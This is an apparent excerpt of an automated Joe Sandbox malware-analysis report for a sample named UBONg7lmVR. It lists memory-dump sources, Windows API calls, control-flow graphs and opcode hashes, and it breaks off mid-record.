                                                  • Instruction Fuzzy Hash: 1CA17E75E003199FCF04DFA4D8449DDBBBAFF99310F148619E81AAB365DB30A985CB50
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556650373.0000000009850000.00000040.00000800.00020000.00000000.sdmp, Offset: 09850000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9850000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 68885a435f6d961c2a28f6c786988695e821c152c9181b20c78f27370dabde3f
                                                  • Instruction ID: ebf3728fdf38987dd8987fa74821744e88843a00b07316aa5c84dde6cdc9680a
                                                  • Opcode Fuzzy Hash: 68885a435f6d961c2a28f6c786988695e821c152c9181b20c78f27370dabde3f
                                                  • Instruction Fuzzy Hash: FD919035E0031A9FCF05DFA0D8449DDBBBAFF99310B158219E816AF365EB30A985CB50

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1231 9850040-9850059 1232 98500dc-98500df 1231->1232 1233 985005f-9850063 1231->1233 1234 9850065-985007f 1233->1234 1235 98500e0-985014e 1233->1235 1240 9850081-9850088 1234->1240 1241 9850093-98500b5 1234->1241 1255 9850154-985017a 1235->1255 1256 9850208-985020d 1235->1256 1240->1241 1242 985008a-985008c 1240->1242 1248 98500bc-98500be 1241->1248 1242->1241 1249 98500d5 1248->1249 1250 98500c0-98500cc 1248->1250 1249->1232 1250->1249 1254 98500ce 1250->1254 1254->1249 1260 985017c-9850187 1255->1260 1261 985018a-985018f 1255->1261 1260->1261 1262 9850191 1261->1262 1263 9850198-98501a0 1261->1263 1269 9850193 call 5bde23f 1262->1269 1270 9850193 call 5bde250 1262->1270 1264 98501c5-98501fe KiUserCallbackDispatcher 1263->1264 1265 98501a2-98501bb 1263->1265 1264->1256 1265->1264 1269->1263 1270->1263
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(00000037,00000000,00000000,06D64108,05D99AA8,?,00000000,?,00000000,00000000), ref: 098501F7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556650373.0000000009850000.00000040.00000800.00020000.00000000.sdmp, Offset: 09850000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9850000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID: Huq
                                                  • API String ID: 2492992576-93357626
                                                  • Opcode ID: 6b201e4f13d252c37e2dc2e4c119ff600c5720a80fe002d259698bfcef319798
                                                  • Instruction ID: b48bfbe6d46221ca56163c1ed093c136bdbf6edd4f33e003000f3ae135a14eb2
                                                  • Opcode Fuzzy Hash: 6b201e4f13d252c37e2dc2e4c119ff600c5720a80fe002d259698bfcef319798
                                                  • Instruction Fuzzy Hash: 6F515E343006108FDB19EF38C458B2E77A7BFC5B10B1585A9E40ACB3A1CF65EC469BA5

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1374 9891858-98918ba call 9890c04 1381 98918bc-98918be 1374->1381 1382 9891920-989194c 1374->1382 1383 9891953-989195b 1381->1383 1384 98918c4-98918d0 1381->1384 1382->1383 1389 9891962-9891a9d 1383->1389 1384->1389 1390 98918d6-9891911 call 9890c10 1384->1390 1409 9891aa3-9891ab1 1389->1409 1400 9891916-989191f 1390->1400 1410 9891aba-9891b00 1409->1410 1411 9891ab3-9891ab9 1409->1411 1416 9891b0d 1410->1416 1417 9891b02-9891b05 1410->1417 1411->1410 1418 9891b0e 1416->1418 1417->1416 1418->1418
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556875062.0000000009890000.00000040.00000800.00020000.00000000.sdmp, Offset: 09890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9890000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Huq$Huq
                                                  • API String ID: 0-820920211
                                                  • Opcode ID: 74dff41531005cd7cd7b445447c621573184c9ddb61410409226e34b3a5b11a7
                                                  • Instruction ID: 48759a4b3a9b6b15612d7f1d02ca89fbfdf1982aa38441dbf2e1addd3b6b89d7
                                                  • Opcode Fuzzy Hash: 74dff41531005cd7cd7b445447c621573184c9ddb61410409226e34b3a5b11a7
                                                  • Instruction Fuzzy Hash: 73814A74E143598FDF04DFA9C8586AEBBF2BF88300F14852AE409EB354DB749905CBA1
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(00000000,?), ref: 0B3AB245
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3559158420.000000000B3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b3a0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  • Opcode ID: 6bcfa8d31db6be55935de682509a09a86a61702e640fdf0259e3a5a299c207b1
                                                  • Instruction ID: 66d5c44ace35d46e034c249b060af0e55e5026d49ea02fb4c1ee4613620281b5
                                                  • Opcode Fuzzy Hash: 6bcfa8d31db6be55935de682509a09a86a61702e640fdf0259e3a5a299c207b1
                                                  • Instruction Fuzzy Hash: BA9159B0A002458FDB14DFA9C984BABBBF5EF88300F258499E815EB252D734E945CB61
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 05B4BFB6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3547802672.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b40000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: 696021ab40489d0cadfd8f035e832084e573183dd9eae78fb29999be06c24958
                                                  • Instruction ID: ce68b104ae6b432ef423782c421c7070258003dde00a3e9bef1257ea004e873e
                                                  • Opcode Fuzzy Hash: 696021ab40489d0cadfd8f035e832084e573183dd9eae78fb29999be06c24958
                                                  • Instruction Fuzzy Hash: B1812370A00B458FDB24DF29D444B6ABBF2FF88200F008A6DD28A9BA41D775F945CF91
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(00000000,?), ref: 0B3AB245
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3559158420.000000000B3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b3a0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  • Opcode ID: f720b34995f5d61f3839e030bb183d43fd4712e58172b0e5ced11db6ecc19611
                                                  • Instruction ID: 11374c6d0b9d363642d4e157b845270758b69798988e4cb985e4d1dfe33f852e
                                                  • Opcode Fuzzy Hash: f720b34995f5d61f3839e030bb183d43fd4712e58172b0e5ced11db6ecc19611
                                                  • Instruction Fuzzy Hash: 7B5108B4A002499FDB14DFA9C984BAEBBF9EF88300F258459E815EB351D734ED41CB61
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 09852A22
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556650373.0000000009850000.00000040.00000800.00020000.00000000.sdmp, Offset: 09850000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9850000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: e25dacfb15b795c299f58e4843f000295d8c00acea6247a7639349dad7dd0ea9
                                                  • Instruction ID: 662a198ef6f1d37a80bcdd28cb6c14854ee6ff795aa827f0efef81c45e99cf2a
                                                  • Opcode Fuzzy Hash: e25dacfb15b795c299f58e4843f000295d8c00acea6247a7639349dad7dd0ea9
                                                  • Instruction Fuzzy Hash: 1D51D1B1D103499FDB15DF99D884ADEBBB5FF88310F64812AE819AB310DB71A845CF90
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 09852A22
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556650373.0000000009850000.00000040.00000800.00020000.00000000.sdmp, Offset: 09850000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9850000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: 2621b8fcc19513507b0d4ff8fedeca3924ec4f9432e16aaed95ca89b2a6c7033
                                                  • Instruction ID: 47261d830e08b002416f36dd75432791238b8983fd854ab1be59a97de966db2e
                                                  • Opcode Fuzzy Hash: 2621b8fcc19513507b0d4ff8fedeca3924ec4f9432e16aaed95ca89b2a6c7033
                                                  • Instruction Fuzzy Hash: 1051BDB1D103499FDB15DF99C884ADEBBB5BF88310F24812AE819AB310DB75A945CF90
                                                  APIs
                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 09854F91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556650373.0000000009850000.00000040.00000800.00020000.00000000.sdmp, Offset: 09850000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9850000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CallProcWindow
                                                  • String ID:
                                                  • API String ID: 2714655100-0
                                                  • Opcode ID: f4681f9099ebbcb7556163d1ee9a536e2eba70839f14e6c26da403a57dff4a7f
                                                  • Instruction ID: e89e41cc77ef1187702278090f83d7848ca3e74cdd308bbad0bb8ea032693896
                                                  • Opcode Fuzzy Hash: f4681f9099ebbcb7556163d1ee9a536e2eba70839f14e6c26da403a57dff4a7f
                                                  • Instruction Fuzzy Hash: 1241F9B59003099FCB14DF99C448AAABBF5FF88314F24C45DE919A7321D775A885CFA0
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 05B46D59
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3547802672.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b40000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: bebdb9f31cd5551d89c3d3f9afcae8e34bc23d5aaf625ce46b9bfe86a95c0786
                                                  • Instruction ID: 06c64e0b416acb4502fe67d77e1b111acc7c6295020eaf0ba9f5f578d9bbd202
                                                  • Opcode Fuzzy Hash: bebdb9f31cd5551d89c3d3f9afcae8e34bc23d5aaf625ce46b9bfe86a95c0786
                                                  • Instruction Fuzzy Hash: 9241CFB0D00729CFDB24DFA9C845B9EBBB5BF49304F20806AD409AB251DB756949CF90
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 05B46D59
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3547802672.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b40000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: a886953c5d4831e314343df1656b685228ef52b4cb0b54207c99bfd4d8e625f8
                                                  • Instruction ID: 6860ae1504d1d5571c5189aaa80e8afba80e2eff2180a1b6ae0dbdfca84c2c45
                                                  • Opcode Fuzzy Hash: a886953c5d4831e314343df1656b685228ef52b4cb0b54207c99bfd4d8e625f8
                                                  • Instruction Fuzzy Hash: BA41D2B0C00759CEDB24DFA9C845BDEBBF5BF49304F24806AD409AB251DB756949CF50
                                                  APIs
                                                  • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,05BD0F5D,?,?), ref: 05BD100F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3547924034.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5bd0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: DrawText
                                                  • String ID:
                                                  • API String ID: 2175133113-0
                                                  • Opcode ID: 269b1560af63dfc1e63ff51ff4d4ea38733ebce7effbdf44cd5c0858f487f455
                                                  • Instruction ID: b3706befddfbb41cf604f718fec9dd626ac276a86ee00f01ac8c3c5fb10ed3aa
                                                  • Opcode Fuzzy Hash: 269b1560af63dfc1e63ff51ff4d4ea38733ebce7effbdf44cd5c0858f487f455
                                                  • Instruction Fuzzy Hash: 56214A76D002089FDF14EF98D844ADEFBB5FF98314F14812AE919A7210E731A955CBA0
                                                  APIs
                                                  • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,05BD0F5D,?,?), ref: 05BD100F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3547924034.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5bd0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: DrawText
                                                  • String ID:
                                                  • API String ID: 2175133113-0
                                                  • Opcode ID: a3273c2699b8d5542be6ccaf12fefc46674eace3e8c6eb86143a84eb587c6035
                                                  • Instruction ID: 399a1bf6df67101604e5f8e837952dbdf133d0f194826cc63bf358ddb8ae4add
                                                  • Opcode Fuzzy Hash: a3273c2699b8d5542be6ccaf12fefc46674eace3e8c6eb86143a84eb587c6035
                                                  • Instruction Fuzzy Hash: FA31E2B59003499FDB10DF9AD884AAEFBF5FB48310F14842AE919A7310E774A944CFA4
                                                  APIs
                                                  • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,05BD0F5D,?,?), ref: 05BD100F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3547924034.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5bd0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: DrawText
                                                  • String ID:
                                                  • API String ID: 2175133113-0
                                                  • Opcode ID: 68402ae24925e724504ab6e37f6aceb0660a2d44684b94ead47bf6d81a625221
                                                  • Instruction ID: ac4d7d3b93e506be08328afb6eecda794129e70e4f05c0051135edda3a4e032e
                                                  • Opcode Fuzzy Hash: 68402ae24925e724504ab6e37f6aceb0660a2d44684b94ead47bf6d81a625221
                                                  • Instruction Fuzzy Hash: FF31E0B5D012499FDB10DF9AD884AEEFBF5FB48310F24842EE819A7210D374A944CFA0
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,05B4E326,?,?,?,?,?), ref: 05B4E3E7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3547802672.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b40000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 3664bdadca2656fabf5570a978f5ace454967ad307a2961e7ff05f622f2c64e3
                                                  • Instruction ID: 36a59e6e9465f17e771dccef61ac1789e2f960e2c4bffd8ec36dbe4a75f13b1f
                                                  • Opcode Fuzzy Hash: 3664bdadca2656fabf5570a978f5ace454967ad307a2961e7ff05f622f2c64e3
                                                  • Instruction Fuzzy Hash: 502124B5800348AFDB11CFAAD984AEEBFF9FB48320F14845AE914A7311D335A944CF61
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,05B4E326,?,?,?,?,?), ref: 05B4E3E7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3547802672.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b40000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: f5d316fb1476576edd62cdaf993a14d772ce612c5a4bcb7e58ff1ecad21b2120
                                                  • Instruction ID: bf6e7a1a329c74f3ee50d4979331efbc140139e5863ef451908506ee2828344e
                                                  • Opcode Fuzzy Hash: f5d316fb1476576edd62cdaf993a14d772ce612c5a4bcb7e58ff1ecad21b2120
                                                  • Instruction Fuzzy Hash: 442116B59003489FDB11CFAAD885ADEFBF9FB48310F10805AE915A7310D374A950DFA5
                                                  APIs
                                                  • EnumThreadWindows.USER32(?,00000000,?), ref: 0B3AAEE9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3559158420.000000000B3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b3a0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: EnumThreadWindows
                                                  • String ID:
                                                  • API String ID: 2941952884-0
                                                  • Opcode ID: 82dccc379e7f1aeca3f6ba1f5e7c9cb3cd1f934c8825927098d5175c185d76b8
                                                  • Instruction ID: 57a8b97df5fd41b9d3708184b535a9326f180e43282de0e86a0ad06c861fdb4c
                                                  • Opcode Fuzzy Hash: 82dccc379e7f1aeca3f6ba1f5e7c9cb3cd1f934c8825927098d5175c185d76b8
                                                  • Instruction Fuzzy Hash: E72115B19002598FDB14DFAAC885BEEFBF5FB88320F24842AD415A7250D778A945CF61
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 0B3A889D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3559158420.000000000B3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b3a0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  • Opcode ID: 7fe4dec91d7cde1e3ec8927ab5c5979e93abeb8b8be9f1de0a5120ce179e8293
                                                  • Instruction ID: 7221ec4d00dccbc0b20401e2a712bb61562ead043c4ce12b5dc0b70653fbdfc3
                                                  • Opcode Fuzzy Hash: 7fe4dec91d7cde1e3ec8927ab5c5979e93abeb8b8be9f1de0a5120ce179e8293
                                                  • Instruction Fuzzy Hash: 5C1156347256508FC725AB3DC45496A7BE9EFC655132540EAE502CF3B6DF21DC02C751
                                                  APIs
                                                  • MessageBoxW.USER32(?,00000000,00000000,?), ref: 0B3AB3F5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3559158420.000000000B3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b3a0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: Message
                                                  • String ID:
                                                  • API String ID: 2030045667-0
                                                  • Opcode ID: 59d1f2a2693dc59535b6cd89b0f671d9ba08d35325ef566687ecb03af34f94a6
                                                  • Instruction ID: 527d8ef2518533ef747d1e84d776abe28b450e767328411ce1671b7d4d665df4
                                                  • Opcode Fuzzy Hash: 59d1f2a2693dc59535b6cd89b0f671d9ba08d35325ef566687ecb03af34f94a6
                                                  • Instruction Fuzzy Hash: 122132B5C013499FCB10CFAAD888ADEFBB4FB88310F20846ED459A7200D375A548CFA1
                                                  APIs
                                                  • EnumThreadWindows.USER32(?,00000000,?), ref: 0B3AAEE9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3559158420.000000000B3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b3a0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: EnumThreadWindows
                                                  • String ID:
                                                  • API String ID: 2941952884-0
                                                  • Opcode ID: 5689cb99dac97b6a0a17aba72762bd9a7d3f1450a2c0f70682cfff36f9ec7928
                                                  • Instruction ID: 85cfd192f2c744ccb54384241fe06595bae058007b04ab927e8b0a251e5a7875
                                                  • Opcode Fuzzy Hash: 5689cb99dac97b6a0a17aba72762bd9a7d3f1450a2c0f70682cfff36f9ec7928
                                                  • Instruction Fuzzy Hash: 672136B1D002098FDB14DF9AC845BEEFBF5FB88320F24842AD419A3250D778A944CFA4
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 0B3A889D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3559158420.000000000B3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b3a0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  • Opcode ID: 63e782b305388fcfbbe62f9ecb6f22e9d65108d8fd0fd768c3f8e43752a78628
                                                  • Instruction ID: bc444893d7717c41780088d11700ea87ebc8144d9a60d3f3404008c1e94c1d69
                                                  • Opcode Fuzzy Hash: 63e782b305388fcfbbe62f9ecb6f22e9d65108d8fd0fd768c3f8e43752a78628
                                                  • Instruction Fuzzy Hash: 5F11C9347206118F8618AA3DC45496ABBAEEFC5A5132540AAE902CF3B5DF71EC028795
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 0AD12A7D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3557744285.000000000AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AD10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ad10000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID:
                                                  • API String ID: 2538663250-0
                                                  • Opcode ID: 5277aac99a36e7213b59882547b450d63111db9b9e95b2e3d1ff120766e69a45
                                                  • Instruction ID: ea9c7d8ca5860dbf1da804427576f3135c62d9928211a37f5cf95e27968b4333
                                                  • Opcode Fuzzy Hash: 5277aac99a36e7213b59882547b450d63111db9b9e95b2e3d1ff120766e69a45
                                                  • Instruction Fuzzy Hash: 0A215EB1D003449FCB20DF99D58A7DEBBF4EB48314F114819D45AA3651D37AA644CFA4
                                                  APIs
                                                  • MessageBoxW.USER32(?,00000000,00000000,?), ref: 0B3AB3F5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3559158420.000000000B3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b3a0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: Message
                                                  • String ID:
                                                  • API String ID: 2030045667-0
                                                  • Opcode ID: 2f7ee8899e90a3b15471e8ae950aea7f23bb6b9d735e101faec750ea44da0e7f
                                                  • Instruction ID: 74267534d262075ce2e2f8165e9581d851850ccfdfdf1737aef8b3102804ee4d
                                                  • Opcode Fuzzy Hash: 2f7ee8899e90a3b15471e8ae950aea7f23bb6b9d735e101faec750ea44da0e7f
                                                  • Instruction Fuzzy Hash: 7B21E2B59013499FCB14DF9AD884ADEFBB5FB88310F20852ED419A7240D375A548CBA4
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,05B4C431,00000800,00000000,00000000), ref: 05B4C642
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3547802672.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b40000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: e3208620bd92fe657fc19f08205318404a7a9da89678a3befe7f1ffa8a759873
                                                  • Instruction ID: f38171b020d3f77e2e4b1e4ad3578b979960616f34aa24229e817b4d176fe7df
                                                  • Opcode Fuzzy Hash: e3208620bd92fe657fc19f08205318404a7a9da89678a3befe7f1ffa8a759873
                                                  • Instruction Fuzzy Hash: 572103B68013488FDB10DFAAD444A9EFFF4EB88720F14846ED519A7201C375A945CFA5
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,05B4C431,00000800,00000000,00000000), ref: 05B4C642
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3547802672.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b40000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: b8d83c48220da9b12901446e1e72c628a7b0d43e579455f1af178b185e24cf22
                                                  • Instruction ID: 2f11d23ce728fb5c9b503d1f56fa0e0efa24f22ed6411049abf017c6b059eeff
                                                  • Opcode Fuzzy Hash: b8d83c48220da9b12901446e1e72c628a7b0d43e579455f1af178b185e24cf22
                                                  • Instruction Fuzzy Hash: B01114B6C053488FDB20DF9AD448ADEFBF5EB88710F10846ED519A7200C375A945CFA5
                                                  APIs
                                                  • SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 09852BB5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3556650373.0000000009850000.00000040.00000800.00020000.00000000.sdmp, Offset: 09850000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9850000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: LongWindow
                                                  • String ID:
                                                  • API String ID: 1378638983-0
                                                  • Opcode ID: 550b870c145fde321dbb5e3b15df0f735214b555c80a594f17d8febeb77339b4
                                                  • Instruction ID: 49a01b950be3b900cfab2bd1240a4ded6f3cfdf317163bc49d36c2c416819621
                                                  • Opcode Fuzzy Hash: 550b870c145fde321dbb5e3b15df0f735214b555c80a594f17d8febeb77339b4
                                                  • Instruction Fuzzy Hash: FB1126B5900288DFDB10DF99D485BDABBF4EB48324F10885AD815A7341C378A948CFA5
                                                  APIs
                                                  • SetWindowTextW.USER32(?,00000000), ref: 05BDCCD2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3547924034.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5bd0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: TextWindow
                                                  • String ID:
                                                  • API String ID: 530164218-0
                                                  • Opcode ID: 87e6bd2661428c6cc6a0b7b2a4c34d231840eb6bb7212b36ee3613088e70c3ff
                                                  • Instruction ID: a0b91e9ba37be26e32bea0889e9ad5ab2d65e4e5dad6a092c10cdd5364598dff
                                                  • Opcode Fuzzy Hash: 87e6bd2661428c6cc6a0b7b2a4c34d231840eb6bb7212b36ee3613088e70c3ff
                                                  • Instruction Fuzzy Hash: 1B1112B6C002498FDB14CF9AC844ADEFBF5FB88320F14806AD969A7240D738A545CFA1
                                                  APIs
                                                  • SetWindowTextW.USER32(?,00000000), ref: 05BDCCD2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3547924034.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5bd0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: TextWindow
                                                  • String ID:
                                                  • API String ID: 530164218-0
                                                  • Opcode ID: 349b4c29b0ee8b6c745864048491c57cfc1d7c56f3da21b1857d891a12415a1b
                                                  • Instruction ID: f8ca72b40b226c48f3187c772162ad455bcd1ba09c198a85422972942c1689bf
                                                  • Opcode Fuzzy Hash: 349b4c29b0ee8b6c745864048491c57cfc1d7c56f3da21b1857d891a12415a1b
                                                  • Instruction Fuzzy Hash: D01133B6C002498FDB14CF9AC545BEEFBF4FB88310F14802AD829A7250D338A645CFA0
                                                  APIs
                                                  • PeekMessageW.USER32(?,?,?,?,?), ref: 0AD18B80
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.3557744285.000000000AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AD10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ad10000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: MessagePeek
                                                  • String ID:
                                                  • API String ID: 2222842502-0
                                                  • Opcode ID: 1c880365a8d1b21f15b4191d8e2af948f50c471d7fea9231d97549fa3e68c08c
